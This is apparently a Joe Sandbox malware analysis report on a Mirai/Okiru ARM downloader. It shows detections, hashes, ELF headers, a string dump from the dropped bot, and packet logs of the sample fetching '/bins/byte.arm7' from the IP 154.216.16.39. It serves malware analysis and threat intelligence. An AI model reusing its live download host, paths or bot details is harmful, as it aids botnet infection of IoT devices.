Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm7.elf

Overview

General Information

Sample name:dlr.arm7.elf
Analysis ID:1546740
MD5:25a86731d1a9438d58651943ebbe60df
SHA1:5e373c976aeb3296accaa191bc635d86fb0c254e
SHA256:199bbc0daaeae9fc3998feae15204f991cf95884b8882e941234b1722c222780
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Contains symbols with names commonly found in malware
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1546740
Start date and time:2024-11-01 15:05:13 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm7.elf
Detection:MAL
Classification:mal76.troj.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.arm7.elf
Command:/tmp/dlr.arm7.elf
PID:5539
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • dlr.arm7.elf (PID: 5539, Parent: 5459, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm7.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
/tmp/byteJoeSecurity_OkiruYara detected OkiruJoe Security
    /tmp/byteJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: /tmp/byteAvira: detection malicious, Label: EXP/ELF.Mirai.Bootnet.o
      Source: dlr.arm7.elfReversingLabs: Detection: 44%
      Source: byte.12.drString: byte/proc/%d/net/tcp %*d: %*x:%x/proc//proc/%s/exe/proc/self/exe/proc/proc/%d/cmdlinenetstatwgettftpftpcurlbusybox/bin/busyboxvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsBAdAsVWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetdbgcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEunstable_is_the_story_of_the_universemoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinTacoBellGodYololigangExecutionorbitclientAmnesi
      Source: global trafficHTTP traffic detected: GET /bins/byte.arm7 HTTP/1.0Data Raw: 00 00 Data Ascii:
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: unknownTCP traffic detected without corresponding DNS query: 154.216.16.39
      Source: global trafficHTTP traffic detected: GET /bins/byte.arm7 HTTP/1.0Data Raw: 00 00 Data Ascii:

      System Summary

      barindex
      Source: ELF static info symbol of initial sampleName: attack.c
      Source: ELF static info symbol of initial sampleName: attack_get_opt_int
      Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
      Source: ELF static info symbol of initial sampleName: attack_get_opt_str
      Source: ELF static info symbol of initial sampleName: attack_init
      Source: ELF static info symbol of initial sampleName: attack_method.c
      Source: ELF static info symbol of initial sampleName: attack_method_greeth
      Source: ELF static info symbol of initial sampleName: attack_method_greip
      Source: ELF static info symbol of initial sampleName: attack_method_std
      Source: ELF static info symbol of initial sampleName: attack_method_tcpack
      Source: byte.12.drELF static info symbol of dropped file: __gnu_unwind_execute
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal76.troj.linELF@0/1@0/0
      Source: /tmp/dlr.arm7.elf (PID: 5539)File written: /tmp/byteJump to dropped file
      Source: /tmp/dlr.arm7.elf (PID: 5539)Queries kernel information via 'uname': Jump to behavior
      Source: dlr.arm7.elf, 5539.1.000055baa5251000.000055baa537f000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
      Source: dlr.arm7.elf, 5539.1.00007ffe6fd9b000.00007ffe6fdbc000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm7.elf
      Source: dlr.arm7.elf, 5539.1.000055baa5251000.000055baa537f000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
      Source: dlr.arm7.elf, 5539.1.00007ffe6fd9b000.00007ffe6fdbc000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path Interception1
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote ServicesData from Local System1
      Non-Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      SourceDetectionScannerLabelLink
      dlr.arm7.elf45%ReversingLabsLinux.Backdoor.Mirai
      SourceDetectionScannerLabelLink
      /tmp/byte100%AviraEXP/ELF.Mirai.Bootnet.o
      /tmp/byte79%ReversingLabsLinux.Trojan.Mirai
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      154.216.16.39
      unknownSeychelles
      135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      154.216.16.39dlr.mpsl.elfGet hashmaliciousOkiruBrowse
      • /bins/byte.mpsl
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      SKHT-ASShenzhenKatherineHengTechnologyInformationCozmap.x86.elfGet hashmaliciousOkiruBrowse
      • 154.216.16.38
      dlr.mpsl.elfGet hashmaliciousOkiruBrowse
      • 154.216.16.39
      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
      • 154.216.17.34
      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
      • 154.216.17.34
      x86.elfGet hashmaliciousMiraiBrowse
      • 156.241.11.55
      arm7.elfGet hashmaliciousMiraiBrowse
      • 156.230.19.169
      zmap.arm.elfGet hashmaliciousMirai, OkiruBrowse
      • 154.216.20.164
      arm5.elfGet hashmaliciousUnknownBrowse
      • 154.216.20.58
      jew.spc.elfGet hashmaliciousMiraiBrowse
      • 156.254.70.156
      x86_64.elfGet hashmaliciousMiraiBrowse
      • 156.241.11.59
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      /tmp/bytedlr.arm7.elfGet hashmaliciousMirai, OkiruBrowse
        Process:/tmp/dlr.arm7.elf
        File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
        Category:dropped
        Size (bytes):161981
        Entropy (8bit):6.017026154297146
        Encrypted:false
        SSDEEP:3072:ZuxucGNj1tc4ag5gJGW4f5XK7eLuvII4qYuNzEM/9Od4Wt:sxucGRs4ag5UGWW5MeyvPYuNYM/9Od4+
        MD5:4EB42B9C0324C52AA1ABECA8EA1F79A8
        SHA1:00EC248B8264E7816F878ED08EADE699E17D7F23
        SHA-256:5B7BE271C2A864158115154710147CC12077E4D87F8A0701534E27AD32B2ABDE
        SHA-512:EFEEF18BB311D6C5B9DC656DE611DEB09AB61C5AC4B2EA79A2A77D0AA14DACA9A83C5502F1BCEB529A2F362573086EB9D81CE9F526708419FF5FD40EAF647086
        Malicious:true
        Yara Hits:
        • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
        • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 79%
        Joe Sandbox View:
        • Filename: dlr.arm7.elf, Detection: malicious, Browse
        Reputation:low
        Preview:.ELF..............(.........4...........4. ...(........p............................................................................l....;..........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../...............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0..9...3..L............P..@-..@.......0....S.................0....S...............P..............@..../..@.......G-......`...p...... ...6....p..0...0....P..P...P....U......G..../.6....p..@........P..........7.. ....... ......l4......j4..l0........Q.....`0... .......0....S..................0....S...........P.........U4........... ..$0.........../.....0...4....O-...Q...M..@...P..........O..../.........!<.. 4...,...4....T.......... ....T.. ............Y......1...p...0D...S....:.........`...0...........pg..............0G.. P..`F...V..0...@... ......
        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
        Entropy (8bit):4.8010558734870195
        TrID:
        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
        File name:dlr.arm7.elf
        File size:1'500 bytes
        MD5:25a86731d1a9438d58651943ebbe60df
        SHA1:5e373c976aeb3296accaa191bc635d86fb0c254e
        SHA256:199bbc0daaeae9fc3998feae15204f991cf95884b8882e941234b1722c222780
        SHA512:20ae9e11cc707021cfc16024d7066f1b0945a24f353abb8aed57caeba18c876d4e9bd2a8a999b1f652d76f00f1d84e033b656bdb5146b8cc501041192c0c0c1c
        SSDEEP:24:uAd9KGpa7Urz/jlfeCAXK1hH9Vev3gRGaJ9i9BBuLlgCk9gD10yd:uA9KGpa7UrLZe4I+J+Bu5kE10yd
        TLSH:2031DFD1A3D05D7CC8E411BEBE5B0354B378AF00E0CE3222822C67286D2AE7D5D37455
        File Content Preview:.ELF..............(.........4...........4. ...(.....................l...l...............l...l...l.......................l...l...l...................Q.td.........................................8...<...4...........(.."...#...../...-.......M................

        ELF header

        Class:ELF32
        Data:2's complement, little endian
        Version:1 (current)
        Machine:ARM
        Version Number:0x1
        Type:EXEC (Executable file)
        OS/ABI:UNIX - System V
        ABI Version:0
        Entry Point Address:0x83ac
        Flags:0x4000002
        ELF Header Size:52
        Program Header Offset:52
        Program Header Size:32
        Number of Program Headers:4
        Section Header Offset:1220
        Section Header Size:40
        Number of Section Headers:7
        Header String Table Index:6
        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
        NULL0x00x00x00x00x0000
        .textPROGBITS0x80c00xc00x3600x00x6AX0016
        .rodataPROGBITS0x84200x4200x4c0x10x32AMS004
        .tbssNOBITS0x1046c0x46c0x80x00x403WAT004
        .gotPROGBITS0x1046c0x46c0x100x40x3WA004
        .ARM.attributesARM_ATTRIBUTES0x00x47c0x140x00x0001
        .shstrtabSTRTAB0x00x4900x340x00x0001
        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
        LOAD0x00x80000x80000x46c0x46c5.21680x5R E0x8000.text .rodata
        LOAD0x46c0x1046c0x1046c0x100x100.33730x6RW 0x8000.tbss .got
        TLS0x46c0x1046c0x1046c0x00x80.00000x4R 0x4.tbss
        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
        TimestampSource PortDest PortSource IPDest IP
        Nov 1, 2024 15:06:15.055866003 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:15.186290979 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:15.186455965 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:15.187587023 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:15.192440033 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.088857889 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.088984966 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.088998079 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089010954 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089021921 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089032888 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089047909 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089059114 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089071035 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089071989 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089071989 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089071989 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089072943 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089099884 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089113951 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089113951 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089113951 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089123011 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.089149952 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.089149952 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.093950987 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.094007969 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.094033957 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.094074965 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.094109058 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.094157934 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.224518061 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.224541903 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.224579096 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.224579096 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.224782944 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.224813938 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.224829912 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.229283094 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.229295969 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.229505062 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.229542017 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.229556084 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.231081963 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.234052896 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.234066963 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.234077930 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.234271049 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.234360933 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.234373093 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.235079050 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.238778114 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.238810062 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.239094019 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.239176989 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.239191055 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.239938021 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.243520975 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.243532896 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.243542910 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.243820906 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.243957996 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.243971109 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.244626045 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.248440981 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.248452902 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.249178886 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.361884117 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.361908913 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.361932993 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.361951113 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362226009 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362236977 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362247944 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362260103 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362674952 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362734079 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362745047 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.362755060 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363298893 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363358974 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363372087 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363390923 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363401890 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363888025 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.363965988 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363980055 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.363991022 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.364088058 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.364103079 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.364717007 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.364732981 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.364743948 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.364876032 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.364887953 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.365545034 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.365601063 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.365753889 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.543118954 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.548120022 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548135042 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548157930 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548168898 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548180103 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548191071 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548202038 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548515081 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548573017 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548584938 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548629999 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.548683882 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548696041 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548706055 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.548717976 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.549629927 CET8039058154.216.16.39192.168.2.14
